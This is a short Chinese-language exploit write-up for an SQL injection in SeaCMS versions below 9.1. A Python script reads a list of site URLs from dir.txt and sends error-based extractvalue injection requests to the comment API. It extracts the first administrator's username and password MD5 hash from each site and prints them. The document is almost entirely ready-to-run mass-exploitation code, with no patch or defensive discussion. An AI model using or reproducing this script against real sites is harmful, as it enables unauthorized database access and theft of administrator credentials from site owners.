SeaCMS V9.1以下版本SQL注入漏洞

获取管理员表的第一个用户的账号和管理员表中第一个用户的密码的md5值

需要在脚本的同级目录新建一个dir.txt里面存放网址

#SeaCMS 
#Author：Root
import requests
import time
import re
dir = open('dir.txt','r')
for i in dir:
    try:
        print(time.strftime('%Y-%m-%d %H:%M:%S'))
        url = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`"
        url2 = i.strip('\n')+"/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`"
        s = requests.session()
        a = s.get(url,timeout=10)
        b = s.get(url2,timeout=10)
        view = a.text
        view2 = b.text
        pw = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view))
        name = "".join(re.findall("XPATH syntax error: '\\\\ (.*?)\' <",view2))
        if(pw and name):
            print("[*]Success! "+i.strip('\n'))
            print("[*]AdminName: "+name)
            print("[*]AdminPass: "+pw+'\n')
        else:
            print("[*]We found nothing in "+i)
    except:
        print("[*]Cannot connect "+i)